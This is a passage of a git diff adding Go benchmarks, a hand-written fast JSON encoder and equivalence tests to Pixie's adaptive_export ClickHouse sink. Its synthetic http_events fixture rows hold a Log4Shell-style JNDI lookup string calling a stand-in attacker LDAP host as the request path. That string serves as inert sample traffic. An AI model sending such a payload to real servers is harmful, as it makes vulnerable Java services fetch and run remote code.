+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package sink
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"net/http/httptest"
+	"testing"
+	"time"
+)
+
+// The sink's WritePixieRows path is one of the dominant CPU consumers
+// when AE is under load: every controller fan-out pass writes a per-
+// table batch (up to MaxBatchRows) and every row goes through the
+// per-key normalisePixieValue switch AND the json.Encoder's reflection.
+//
+// These benchmarks isolate the encoding cost from the HTTP roundtrip:
+//
+// - BenchmarkEncodeJSONEachRow_PixieShape: the encode loop alone
+// (mirrors clickhouse.go:160-167's hot path), no HTTP.
+// - BenchmarkWritePixieRows_LocalHTTPLoopback: the encode + HTTP
+// roundtrip against a no-op httptest server, so the timer includes
+// the HTTP client overhead AE actually pays per call.
+// - BenchmarkNormalisePixieValue_TimeRow: the per-row per-column
+// switch with a single time.Time field (the realistic per-pixie-row
+// shape — time_ is always TIME64NS so this fires on every row).
+
+// benchTable is the pixie table name the benchmarks in this file pass
+// to encodePixieRowsFast and WritePixieRows.
+const benchTable = "http_events"
+
+// makePixieRowsBatch returns n synthetic http_events-style rows for the
+// encoder benchmarks. Every row has the same 24 keys: time_ and
+// event_time as time.Time, nine integer columns (encrypted as uint8,
+// the rest int64) and thirteen strings, one of them a log4shell-style
+// JNDI request path. Row i gets a timestamp i nanoseconds past a fixed
+// base, a upid ending in i as 16 hex digits, and remote_port
+// 54321 + i%100; every other value is constant.
+//
+// NOTE(review): this shape has no req_body_size / resp_body_size keys,
+// which sampleHTTPRow in fastencode_test.go does carry — confirm
+// against schema.sql whether the benchmark rows should include them.
+func makePixieRowsBatch(n int) []map[string]any {
+	const baseNanos = 1_700_000_000_000_000_000
+	batch := make([]map[string]any, 0, n)
+	for i := 0; i < n; i++ {
+		stamp := time.Unix(0, int64(baseNanos+i))
+		batch = append(batch, map[string]any{
+			"time_":         stamp,
+			"upid":          fmt.Sprintf("0000000100000000-00000000-%016x", uint64(i)),
+			"namespace":     "log4j-poc",
+			"pod":           "backend-vulnerable-779cd9d765-mxr8t",
+			"remote_addr":   "10.0.0.45",
+			"remote_port":   int64(54321 + i%100),
+			"local_addr":    "10.0.0.12",
+			"local_port":    int64(8080),
+			"trace_role":    int64(2),
+			"encrypted":     uint8(0),
+			"major_version": int64(1),
+			"minor_version": int64(1),
+			"content_type":  int64(0),
+			"req_headers":   `{"User-Agent":"Apache-HttpClient/4.5.13","Accept":"*/*","Content-Type":"application/json"}`,
+			"req_method":    "POST",
+			"req_path":      "/api/v1/products/${jndi:ldap://attacker.example/Payload}",
+			"req_body":      `{"id":42,"qty":1}`,
+			"resp_headers":  `{"Content-Type":"application/json","Server":"jetty"}`,
+			"resp_status":   int64(500),
+			"resp_message":  "Internal Server Error",
+			"resp_body":     `{"error":"NullPointerException"}`,
+			"latency":       int64(123456789),
+			"hostname":      "pixie-worker-node",
+			"event_time":    stamp,
+		})
+	}
+	return batch
+}
+
+// BenchmarkEncodeJSONEachRow_PixieShape times the encoding/json path on
+// a 1000-row batch with no HTTP involved: each iteration copies every
+// row into a fresh map through normalisePixieValue and encodes it as
+// one JSON line with HTML escaping switched off.
+//
+// Per the original note this mirrors the sink's encode loop at
+// clickhouse.go:160-167, and 1000 rows is MaxBatchRows, the largest
+// batch a controller fan-out pass writes — neither is visible from
+// this file.
+func BenchmarkEncodeJSONEachRow_PixieShape(b *testing.B) {
+	batch := makePixieRowsBatch(1000)
+	b.ResetTimer()
+	b.ReportAllocs()
+	for iter := 0; iter < b.N; iter++ {
+		var out bytes.Buffer
+		encoder := json.NewEncoder(&out)
+		encoder.SetEscapeHTML(false)
+		for _, src := range batch {
+			normalised := make(map[string]any, len(src))
+			for key, val := range src {
+				normalised[key] = normalisePixieValue(val)
+			}
+			if err := encoder.Encode(normalised); err != nil {
+				b.Fatal(err)
+			}
+		}
+	}
+}
+
+// BenchmarkEncodeJSONEachRow_PixieShape_SmallBatch is the 50-row
+// variant of the encoding/json benchmark: the same normalise-then-
+// encode loop, sized (per the original note) like a quiet
+// kubescape-driven controller pass of 50 rows per table per refresh
+// interval.
+func BenchmarkEncodeJSONEachRow_PixieShape_SmallBatch(b *testing.B) {
+	batch := makePixieRowsBatch(50)
+	b.ResetTimer()
+	b.ReportAllocs()
+	for iter := 0; iter < b.N; iter++ {
+		var out bytes.Buffer
+		encoder := json.NewEncoder(&out)
+		encoder.SetEscapeHTML(false)
+		for _, src := range batch {
+			normalised := make(map[string]any, len(src))
+			for key, val := range src {
+				normalised[key] = normalisePixieValue(val)
+			}
+			if err := encoder.Encode(normalised); err != nil {
+				b.Fatal(err)
+			}
+		}
+	}
+}
+
+// BenchmarkEncodePixieRowsFast_PixieShape times encodePixieRowsFast on
+// the same 1000-row batch as BenchmarkEncodeJSONEachRow_PixieShape, so
+// the two results compare directly. Each iteration encodes into a
+// fresh, unpooled bytes.Buffer. (The original note calls the fast
+// encoder "the option-2 refactor": fixed schema column order and a type
+// switch instead of reflection and per-row key sorting.)
+func BenchmarkEncodePixieRowsFast_PixieShape(b *testing.B) {
+	batch := makePixieRowsBatch(1000)
+	b.ResetTimer()
+	b.ReportAllocs()
+	for iter := 0; iter < b.N; iter++ {
+		var out bytes.Buffer
+		err := encodePixieRowsFast(&out, benchTable, batch)
+		if err != nil {
+			b.Fatal(err)
+		}
+	}
+}
+
+// BenchmarkEncodePixieRowsFast_PixieShape_SmallBatch is the 50-row
+// variant of the unpooled fast-encoder benchmark.
+func BenchmarkEncodePixieRowsFast_PixieShape_SmallBatch(b *testing.B) {
+	batch := makePixieRowsBatch(50)
+	b.ResetTimer()
+	b.ReportAllocs()
+	for iter := 0; iter < b.N; iter++ {
+		var out bytes.Buffer
+		err := encodePixieRowsFast(&out, benchTable, batch)
+		if err != nil {
+			b.Fatal(err)
+		}
+	}
+}
+
+// BenchmarkEncodePixieRowsFast_Pooled_PixieShape adds buffer pooling
+// ("option 1") on top of the fast encoder ("option 2"). Each iteration
+// takes a buffer from encodeBufPool, resets it, encodes a 1000-row
+// batch and returns the buffer to the pool — the shape the original
+// note attributes to the real WritePixieRows. The reported allocation
+// rate is therefore the warm-pool steady state: the first buffer's
+// growth is amortised over b.N.
+func BenchmarkEncodePixieRowsFast_Pooled_PixieShape(b *testing.B) {
+	batch := makePixieRowsBatch(1000)
+	b.ResetTimer()
+	b.ReportAllocs()
+	for iter := 0; iter < b.N; iter++ {
+		pooled := encodeBufPool.Get().(*bytes.Buffer)
+		pooled.Reset()
+		err := encodePixieRowsFast(pooled, benchTable, batch)
+		if err != nil {
+			b.Fatal(err)
+		}
+		encodeBufPool.Put(pooled)
+	}
+}
+
+// BenchmarkEncodePixieRowsFast_Pooled_PixieShape_SmallBatch is the
+// 50-row variant of the pooled fast-encoder benchmark: Get, Reset,
+// encode, Put on every iteration.
+func BenchmarkEncodePixieRowsFast_Pooled_PixieShape_SmallBatch(b *testing.B) {
+	batch := makePixieRowsBatch(50)
+	b.ResetTimer()
+	b.ReportAllocs()
+	for iter := 0; iter < b.N; iter++ {
+		pooled := encodeBufPool.Get().(*bytes.Buffer)
+		pooled.Reset()
+		err := encodePixieRowsFast(pooled, benchTable, batch)
+		if err != nil {
+			b.Fatal(err)
+		}
+		encodeBufPool.Put(pooled)
+	}
+}
+
+// BenchmarkNormalisePixieValue_TimeRow times normalisePixieValue on a
+// single time.Time in isolation. Per the original note that
+// normalisation formats the UTC time into a ~30-byte string — one
+// allocation per time field — and every pixie row has at least one
+// (time_).
+func BenchmarkNormalisePixieValue_TimeRow(b *testing.B) {
+	stamp := time.Now()
+	b.ResetTimer()
+	b.ReportAllocs()
+	for iter := 0; iter < b.N; iter++ {
+		_ = normalisePixieValue(stamp)
+	}
+}
+
+// BenchmarkWritePixieRows_LocalHTTPLoopback measures the whole sink
+// write path for a 1000-row batch: encoding plus an HTTP round trip to
+// an in-process httptest server that stores nothing.
+//
+// The handler drains the request body before replying. net/http only
+// discards a bounded amount of unread body once a handler returns; when
+// more is pending it closes the connection instead. An undrained
+// 1000-row POST therefore makes every iteration open a new connection
+// (and races the reply against the upload) rather than exercising the
+// keep-alive path.
+//
+// The X-ClickHouse-Summary header reports written_rows equal to the
+// batch size so that, per the original note, the sink's
+// summaryWroteFewerThan check does not trip.
+func BenchmarkWritePixieRows_LocalHTTPLoopback(b *testing.B) {
+	rows := makePixieRowsBatch(1000)
+	// Loop-invariant: build the summary once instead of on every request.
+	summary := fmt.Sprintf(`{"read_rows":"0","read_bytes":"0","written_rows":"%d","written_bytes":"0"}`, len(rows))
+
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if _, err := io.Copy(io.Discard, r.Body); err != nil {
+			http.Error(w, err.Error(), http.StatusBadRequest)
+			return
+		}
+		w.Header().Set("X-ClickHouse-Summary", summary)
+		w.WriteHeader(http.StatusOK)
+	}))
+	defer srv.Close()
+
+	s, err := New(Config{
+		Endpoint: srv.URL,
+		Database: "forensic_db",
+	})
+	if err != nil {
+		b.Fatal(err)
+	}
+
+	b.ResetTimer()
+	b.ReportAllocs()
+	for i := 0; i < b.N; i++ {
+		if err := s.WritePixieRows(b.Context(), benchTable, rows); err != nil {
+			b.Fatal(err)
+		}
+	}
+}
diff --git a/src/vizier/services/adaptive_export/internal/sink/fastencode.go b/src/vizier/services/adaptive_export/internal/sink/fastencode.go
new file mode 100644
index 00000000000..cfa02bec876
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/sink/fastencode.go
@@ -0,0 +1,273 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package sink
+
+import (
+ "bytes"
+ "encoding/json"
+ "errors"
+ "fmt"
+ "strconv"
+ "sync"
+ "time"
+ "unicode/utf8"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
+)
+
+// encodePixieRowsFast appends rows to buf as a JSONEachRow batch (one
+// JSON object per line) for the named pixie table, without going
+// through encoding/json's reflection path.
+//
+// Columns are written in the order getCachedColumns returns for the
+// table. A column the row has no key for is left out of that object,
+// and row keys that are not schema columns are never written. The one
+// exception is event_time: when a row lacks it but carries time_, the
+// time_ value is written under event_time as well. pxapi result rows
+// only carry time_; per the original notes the column used to be filled
+// in by Pixie's retention plugin, which the operator-direct push path
+// bypasses, so without this the column fell back to ClickHouse's
+// epoch-0 default and every operator-pushed row landed in partition
+// 197001 (rig 6a25c85c, 2026-06-07). schema.sql is said to declare
+// DEFAULT toDateTime64(time_, 3) as well; deriving the value here also
+// covers tables that already existed (CREATE TABLE IF NOT EXISTS is a
+// no-op) and servers that do not evaluate DEFAULT expressions on
+// JSONEachRow inserts.
+//
+// Why a hand-rolled encoder: per the original author's CPU profile,
+// about half of WritePixieRows wall time went to encoding/json's
+// reflection and another ~16 % to sorting map keys for every row. A
+// fixed column order plus a type switch avoids both.
+//
+// Errors: a column-lookup failure is returned unchanged (the tests
+// expect clickhouse.ErrUnknownTable for a table without a schema), and
+// a value appendJSONValue cannot encode is returned wrapped with the
+// table and column name. In every error case buf is truncated back to
+// the length it had on entry, so a caller that falls back to
+// encoding/json never inherits a half-written batch.
+func encodePixieRowsFast(buf *bytes.Buffer, table string, rows []map[string]any) error {
+	cols, err := getCachedColumns(table)
+	if err != nil {
+		return err
+	}
+	start := buf.Len()
+	for _, row := range rows {
+		buf.WriteByte('{')
+		first := true
+		for _, col := range cols {
+			v, ok := row[col]
+			if !ok && col == "event_time" {
+				// Derive event_time from time_; see the doc comment.
+				v, ok = row["time_"]
+			}
+			if !ok {
+				continue
+			}
+			if !first {
+				buf.WriteByte(',')
+			}
+			first = false
+			// Column names from schema.sql are always plain identifiers
+			// (matches chIdentRE in clickhouse.go); safe to emit without
+			// JSON-string escape work.
+			buf.WriteByte('"')
+			buf.WriteString(col)
+			buf.WriteString(`":`)
+			if err := appendJSONValue(buf, v); err != nil {
+				// Drop everything this call wrote, not just the bad row.
+				buf.Truncate(start)
+				return fmt.Errorf("fastencode: %s.%s: %w", table, col, err)
+			}
+		}
+		buf.WriteByte('}')
+		buf.WriteByte('\n')
+	}
+	return nil
+}
+
+// getCachedColumns returns the column list for table, memoising the
+// result of clickhouse.Columns per table name. Per the original note
+// clickhouse.Columns re-parses schema.sql on every call, which would
+// cancel out the fast path's savings on the hot WritePixieRows route.
+//
+// Lookups take the read lock only. On a miss the columns are fetched
+// with no lock held and then stored under the write lock; if another
+// goroutine stored an entry in the meantime, that earlier entry is
+// returned and kept. Errors are returned as-is and never cached, so a
+// failing table is looked up again on the next call.
+func getCachedColumns(table string) ([]string, error) {
+	columnCacheMu.RLock()
+	cached, hit := columnCache[table]
+	columnCacheMu.RUnlock()
+	if hit {
+		return cached, nil
+	}
+
+	parsed, err := clickhouse.Columns(table)
+	if err != nil {
+		return nil, err
+	}
+
+	columnCacheMu.Lock()
+	defer columnCacheMu.Unlock()
+	if winner, raced := columnCache[table]; raced {
+		return winner, nil
+	}
+	columnCache[table] = parsed
+	return parsed, nil
+}
+
+// Memo state behind getCachedColumns.
+var (
+ // columnCacheMu guards columnCache: getCachedColumns reads under
+ // RLock and stores under Lock.
+ columnCacheMu sync.RWMutex
+ // columnCache maps a table name to the column list getCachedColumns
+ // obtained from clickhouse.Columns for it.
+ columnCache = map[string][]string{}
+)
+
+// encodeBufPool hands out *bytes.Buffer values so the encoders can
+// reuse a buffer's backing array instead of allocating a new one for
+// every batch. An empty pool creates a fresh, empty buffer; users are
+// expected to Reset a buffer after Get, as the pooled benchmarks do.
+//
+// Per the original notes: the sink uses this for both the fast and the
+// slow encoder in WritePixieRows / Write, which the fan-out path calls
+// on a 30-second cadence per active anomaly × per pixie table. The
+// first buffer still has to grow once; after the pool warms up,
+// allocations were measured to fall from 2 017 to ~17 per 1000-row
+// batch (BenchmarkEncodePixieRowsFast_Pooled_PixieShape vs unpooled —
+// not re-measured here).
+var encodeBufPool = sync.Pool{
+	New: func() any {
+		return &bytes.Buffer{}
+	},
+}
+
+// errFastEncodeUnsupported is the sentinel appendJSONValue returns for
+// a value whose dynamic type is not in its type switch.
+// encodePixieRowsFast wraps it with %w, so callers should match it with
+// errors.Is and then fall back to encoding/json (WritePixieRows, per
+// the original note).
+var errFastEncodeUnsupported = errors.New("fastencode: unsupported value type")
+
+// appendJSONValue writes v to buf as a single JSON value. It handles
+// nil, string, []byte, bool, the signed and unsigned integer types,
+// float32/float64, time.Time and json.Number — per the original note,
+// the types pxapi produces for pixie observation rows (see
+// internal/pixieapi/pixieapi.go::datumValue and its internal/pixie
+// equivalent). Any other type returns errFastEncodeUnsupported with
+// nothing written for that value, so the caller can fall back to
+// encoding/json instead of dropping or corrupting the row.
+//
+// Deliberate matches with encoding/json:
+//   - float32 is formatted at 32-bit precision (0.1, not
+//     0.10000000149011612);
+//   - an empty json.Number is written as 0.
+//
+// NOTE(review): a []byte is written as plain JSON text, whereas
+// encoding/json base64-encodes byte slices — confirm normalisePixieValue
+// converts them before the slow path sees them. A non-empty
+// json.Number is copied verbatim and not validated.
+func appendJSONValue(buf *bytes.Buffer, v any) error {
+	switch x := v.(type) {
+	case nil:
+		buf.WriteString("null")
+	case string:
+		appendJSONString(buf, x)
+	case []byte:
+		appendJSONString(buf, string(x))
+	case bool:
+		if x {
+			buf.WriteString("true")
+		} else {
+			buf.WriteString("false")
+		}
+	case int:
+		appendInt(buf, int64(x))
+	case int8:
+		appendInt(buf, int64(x))
+	case int16:
+		appendInt(buf, int64(x))
+	case int32:
+		appendInt(buf, int64(x))
+	case int64:
+		appendInt(buf, x)
+	case uint:
+		appendUint(buf, uint64(x))
+	case uint8:
+		appendUint(buf, uint64(x))
+	case uint16:
+		appendUint(buf, uint64(x))
+	case uint32:
+		appendUint(buf, uint64(x))
+	case uint64:
+		appendUint(buf, x)
+	case float32:
+		// bitSize 32 yields the shortest text that round-trips as a
+		// float32; widening first would print float64 noise digits.
+		var tmp [32]byte
+		buf.Write(strconv.AppendFloat(tmp[:0], float64(x), 'g', -1, 32))
+	case float64:
+		appendFloat(buf, x)
+	case time.Time:
+		// ClickHouse DateTime64 string shape, UTC with nine fractional
+		// digits (per the original note, the same layout
+		// normalisePixieValue uses). AppendFormat writes into a scratch
+		// array, so no intermediate string is built.
+		var tmp [40]byte
+		buf.WriteByte('"')
+		buf.Write(x.UTC().AppendFormat(tmp[:0], "2006-01-02 15:04:05.000000000"))
+		buf.WriteByte('"')
+	case json.Number:
+		// json.Number is already decimal text; its zero value is the
+		// empty string, which must not become an empty JSON value.
+		if x == "" {
+			buf.WriteByte('0')
+		} else {
+			buf.WriteString(string(x))
+		}
+	default:
+		return errFastEncodeUnsupported
+	}
+	return nil
+}
+
+// appendInt writes x to buf as base-10 text. The digits are formatted
+// into a fixed-size scratch array first, so no intermediate string is
+// built.
+func appendInt(buf *bytes.Buffer, x int64) {
+	var scratch [24]byte
+	digits := strconv.AppendInt(scratch[:0], x, 10)
+	buf.Write(digits)
+}
+
+// appendUint writes x to buf as base-10 text, formatting into a
+// fixed-size scratch array so no intermediate string is built.
+func appendUint(buf *bytes.Buffer, x uint64) {
+	var scratch [24]byte
+	digits := strconv.AppendUint(scratch[:0], x, 10)
+	buf.Write(digits)
+}
+
+// appendFloat writes x to buf in strconv's shortest 'g' form at 64-bit
+// precision, formatting into a fixed-size scratch array.
+//
+// NOTE(review): NaN and ±Inf come out as NaN / +Inf / -Inf, which is
+// not valid JSON and differs from encoding/json (it rejects them) —
+// confirm whether such values can reach this path and how ClickHouse
+// treats them.
+func appendFloat(buf *bytes.Buffer, x float64) {
+	var scratch [32]byte
+	text := strconv.AppendFloat(scratch[:0], x, 'g', -1, 64)
+	buf.Write(text)
+}
+
+// appendJSONString writes s to buf as a double-quoted JSON string.
+// '"' and '\\' get a leading backslash; newline, carriage return and
+// tab become \n, \r and \t; every other byte below 0x20 becomes \u00XX
+// in lower-case hex. All remaining bytes are copied through untouched:
+// '<', '>' and '&' are not HTML-escaped (the encoding/json path also
+// runs with SetEscapeHTML(false)), and bytes >= 0x80 pass through
+// whether or not they form valid UTF-8.
+//
+// NOTE(review): encoding/json replaces invalid UTF-8 with U+FFFD and
+// escapes U+2028/U+2029 even with HTML escaping off, so the two
+// encoders only agree byte-for-byte on strings containing neither —
+// confirm that is acceptable for captured request/response bodies.
+func appendJSONString(buf *bytes.Buffer, s string) {
+	buf.WriteByte('"')
+	flushed := 0 // s[:flushed] has already been written
+	for i := 0; i < len(s); i++ {
+		c := s[i]
+		if c >= utf8.RuneSelf || safeJSONByte(c) {
+			// Part of a run that is copied verbatim later.
+			continue
+		}
+		buf.WriteString(s[flushed:i])
+		switch c {
+		case '\\', '"':
+			buf.WriteByte('\\')
+			buf.WriteByte(c)
+		case '\n':
+			buf.WriteString(`\n`)
+		case '\r':
+			buf.WriteString(`\r`)
+		case '\t':
+			buf.WriteString(`\t`)
+		default:
+			// The remaining control bytes, 0x00-0x1f.
+			fmt.Fprintf(buf, `\u%04x`, c)
+		}
+		flushed = i + 1
+	}
+	buf.WriteString(s[flushed:])
+	buf.WriteByte('"')
+}
+
+// safeJSONByte reports whether b may appear unescaped inside a JSON
+// string: any ASCII byte from 0x20 through 0x7f other than '"' and
+// '\\'. Bytes >= 0x80 report false; appendJSONString copies those
+// through without consulting this function.
+func safeJSONByte(b byte) bool {
+	switch {
+	case b < 0x20, b >= utf8.RuneSelf:
+		return false
+	case b == '"', b == '\\':
+		return false
+	}
+	return true
+}
diff --git a/src/vizier/services/adaptive_export/internal/sink/fastencode_test.go b/src/vizier/services/adaptive_export/internal/sink/fastencode_test.go
new file mode 100644
index 00000000000..bb88aecd76d
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/sink/fastencode_test.go
@@ -0,0 +1,258 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package sink
+
+import (
+ "bytes"
+ "encoding/json"
+ "errors"
+ "reflect"
+ "strings"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
+)
+
+// The fast encoder must produce byte-equivalent JSON to encoding/json
+// up to map-key ordering (which CH doesn't care about — JSONEachRow
+// is order-agnostic). Round-trip every per-table row shape through
+// both encoders and require the PARSED maps are equal.
+
+// encodeViaJSON is the reference ("slow") encoder the fast path is
+// compared against: every value goes through normalisePixieValue and
+// each row is written as one JSON line by encoding/json with HTML
+// escaping off. It panics if encoding/json rejects a row, because a
+// silently shortened reference output would make the comparison
+// meaningless.
+func encodeViaJSON(rows []map[string]any) []byte {
+	var buf bytes.Buffer
+	enc := json.NewEncoder(&buf)
+	enc.SetEscapeHTML(false)
+	for _, r := range rows {
+		obj := make(map[string]any, len(r))
+		for k, v := range r {
+			obj[k] = normalisePixieValue(v)
+		}
+		if err := enc.Encode(obj); err != nil {
+			panic("encodeViaJSON: " + err.Error())
+		}
+	}
+	return buf.Bytes()
+}
+
+// parseNDJSON decodes newline-delimited JSON into one map per
+// non-empty line. Trailing newlines and blank lines are ignored. It
+// panics on a line that is not valid JSON: the callers compare encoder
+// outputs, and quietly turning a broken line into a nil map would hide
+// exactly the defect they are looking for.
+func parseNDJSON(b []byte) []map[string]any {
+	var out []map[string]any
+	for _, line := range bytes.Split(bytes.TrimRight(b, "\n"), []byte("\n")) {
+		if len(line) == 0 {
+			continue
+		}
+		var m map[string]any
+		if err := json.Unmarshal(line, &m); err != nil {
+			panic("parseNDJSON: " + err.Error() + " in line " + string(line))
+		}
+		out = append(out, m)
+	}
+	return out
+}
+
+// sampleHTTPRow returns a fully-populated http_events-shaped row (26
+// keys) for the encoder tests. time_ and event_time hold the same UTC
+// instant, i nanoseconds past a fixed base; encrypted is a uint8, the
+// other numeric columns are int64, and the rest are strings.
+func sampleHTTPRow(i int) map[string]any {
+	stamp := time.Unix(0, int64(1_700_000_000_000_000_000+i)).UTC()
+	row := map[string]any{
+		"time_":          stamp,
+		"upid":           "0000000100000000-00000000-0000000000000042",
+		"namespace":      "log4j-poc",
+		"pod":            "backend-vulnerable-779cd9d765-mxr8t",
+		"remote_addr":    "10.0.0.45",
+		"remote_port":    int64(54321),
+		"local_addr":     "10.0.0.12",
+		"local_port":     int64(8080),
+		"trace_role":     int64(2),
+		"encrypted":      uint8(0),
+		"major_version":  int64(1),
+		"minor_version":  int64(1),
+		"content_type":   int64(0),
+		"req_headers":    `{"Content-Type":"application/json"}`,
+		"req_method":     "POST",
+		"req_path":       "/api/v1/${jndi:ldap://attacker/Payload}",
+		"req_body":       `{"id":42}`,
+		"req_body_size":  int64(9),
+		"resp_headers":   `{"Content-Type":"application/json"}`,
+		"resp_status":    int64(500),
+		"resp_message":   "Internal Server Error",
+		"resp_body":      `{"error":"NPE"}`,
+		"resp_body_size": int64(16),
+		"latency":        int64(123456789),
+		"hostname":       "pixie-worker-node",
+		"event_time":     stamp,
+	}
+	return row
+}
+
+// TestFastEncode_EquivalentToEncodingJSON_HTTPEvents encodes three
+// sample http_events rows with both encoders and requires the parsed
+// results to be deeply equal. Parsing first makes the comparison
+// independent of key order within each JSON object.
+func TestFastEncode_EquivalentToEncodingJSON_HTTPEvents(t *testing.T) {
+	var rows []map[string]any
+	for i := 1; i <= 3; i++ {
+		rows = append(rows, sampleHTTPRow(i))
+	}
+
+	var fastOut bytes.Buffer
+	if err := encodePixieRowsFast(&fastOut, "http_events", rows); err != nil {
+		t.Fatalf("encodePixieRowsFast: %v", err)
+	}
+
+	gotFast := parseNDJSON(fastOut.Bytes())
+	gotSlow := parseNDJSON(encodeViaJSON(rows))
+	if !reflect.DeepEqual(gotFast, gotSlow) {
+		t.Fatalf("fast vs slow JSON diverged after parse:\n fast=%v\n slow=%v", gotFast, gotSlow)
+	}
+}
+
+// TestFastEncode_EquivalentToEncodingJSON_AllPixieTables runs the
+// fast-vs-slow comparison once per table in clickhouse.PixieTables().
+// For each table it synthesises a single row with a value for every
+// schema column, picking the value type from the column name: time
+// columns get a time.Time, encrypted/ssl a uint8, identity and address
+// columns a "value-<col>" string, recognisably numeric columns an
+// int64, and anything else a "v<col>" string. Because the row covers
+// every column, a column dropped by the fast encoder shows up as a
+// mismatch against the encoding/json output.
+func TestFastEncode_EquivalentToEncodingJSON_AllPixieTables(t *testing.T) {
+	// looksNumeric mirrors the column-name patterns treated as integers.
+	looksNumeric := func(c string) bool {
+		for _, suffix := range []string{"_size", "_count", "_port", "_role", "_version", "_family"} {
+			if strings.HasSuffix(c, suffix) {
+				return true
+			}
+		}
+		for _, prefix := range []string{"conn_", "bytes_"} {
+			if strings.HasPrefix(c, prefix) {
+				return true
+			}
+		}
+		switch c {
+		case "protocol", "trace_role", "content_type", "latency", "resp_status", "major_version", "minor_version":
+			return true
+		}
+		return false
+	}
+	// looksTextual covers address columns and the identity columns.
+	looksTextual := func(c string) bool {
+		if strings.Contains(c, "addr") {
+			return true
+		}
+		switch c {
+		case "pod", "namespace", "hostname", "upid", "comm":
+			return true
+		}
+		return false
+	}
+
+	for _, table := range clickhouse.PixieTables() {
+		t.Run(table, func(t *testing.T) {
+			cols, err := clickhouse.Columns(table)
+			if err != nil {
+				t.Fatalf("Columns(%q): %v", table, err)
+			}
+
+			// The case order below is significant: earlier cases win.
+			row := make(map[string]any, len(cols))
+			for i, c := range cols {
+				switch {
+				case c == "time_" || c == "event_time":
+					row[c] = time.Unix(0, int64(1_700_000_000_000_000_000+i)).UTC()
+				case c == "encrypted" || c == "ssl":
+					row[c] = uint8(0)
+				case looksTextual(c):
+					row[c] = "value-" + c
+				case looksNumeric(c):
+					row[c] = int64(i) + 1
+				default:
+					row[c] = "v" + c
+				}
+			}
+			rows := []map[string]any{row}
+
+			var fastOut bytes.Buffer
+			if err := encodePixieRowsFast(&fastOut, table, rows); err != nil {
+				t.Fatalf("fast: %v", err)
+			}
+
+			gotFast := parseNDJSON(fastOut.Bytes())
+			gotSlow := parseNDJSON(encodeViaJSON(rows))
+			if !reflect.DeepEqual(gotFast, gotSlow) {
+				t.Fatalf("%s fast vs slow diverged:\n fast=%v\n slow=%v",
+					table, gotFast, gotSlow)
+			}
+		})
+	}
+}
+
+// TestFastEncode_UnknownTable_FallsBack checks that a table without a
+// schema makes encodePixieRowsFast return an error matching
+// clickhouse.ErrUnknownTable — the signal WritePixieRows is meant to
+// use to fall back to the encoding/json path instead of failing.
+func TestFastEncode_UnknownTable_FallsBack(t *testing.T) {
+	rows := []map[string]any{{"a": 1}}
+	var out bytes.Buffer
+	if err := encodePixieRowsFast(&out, "not_a_real_table", rows); !errors.Is(err, clickhouse.ErrUnknownTable) {
+		t.Fatalf("expected ErrUnknownTable, got %v", err)
+	}
+}
+
+// TestFastEncode_UnsupportedType_FallsBack checks that a value type
+// outside the fast path's type switch — here a local struct stored
+// under time_ in the second row — yields an error matching
+// errFastEncodeUnsupported, so WritePixieRows can fall back to
+// encoding/json rather than send a broken row.
+func TestFastEncode_UnsupportedType_FallsBack(t *testing.T) {
+	type weirdType struct{ X int }
+	rows := []map[string]any{
+		sampleHTTPRow(0),
+		{"time_": weirdType{X: 1}},
+	}
+	var out bytes.Buffer
+	if err := encodePixieRowsFast(&out, "http_events", rows); !errors.Is(err, errFastEncodeUnsupported) {
+		t.Fatalf("expected errFastEncodeUnsupported, got %v", err)
+	}
+}
+
+// TestFastEncode_EventTime_DerivedFromTime guards the event_time
+// derivation. pxapi rows carry time_ but no event_time, and the fast
+// encoder must then emit event_time = time_ instead of skipping the
+// column; skipping it let ClickHouse apply its epoch-0 default and put
+// every row in partition 197001 (rig 6a25c85c regression, aeprod6
+// silent-drop tail). Per the original note this is the T2
+// write-integrity guard the operator asked for on PR #47.
+func TestFastEncode_EventTime_DerivedFromTime(t *testing.T) {
+	// A realistic Pixie timestamp with a non-zero fraction, so the check
+	// below also covers the sub-second digits.
+	pixieTS := time.Unix(0, 1_717_790_021_560_000_000).UTC()
+
+	row := sampleHTTPRow(0)
+	delete(row, "event_time") // pxapi result rows arrive WITHOUT event_time
+	row["time_"] = pixieTS
+
+	var out bytes.Buffer
+	err := encodePixieRowsFast(&out, "http_events", []map[string]any{row})
+	if err != nil {
+		t.Fatalf("encodePixieRowsFast: %v", err)
+	}
+
+	parsed := parseNDJSON(out.Bytes())
+	if len(parsed) != 1 {
+		t.Fatalf("expected 1 row, got %d", len(parsed))
+	}
+	got, isString := parsed[0]["event_time"].(string)
+	if !isString {
+		t.Fatalf("event_time absent from encoded row: %v", parsed[0])
+	}
+
+	// The expected string is pinned by value rather than derived from
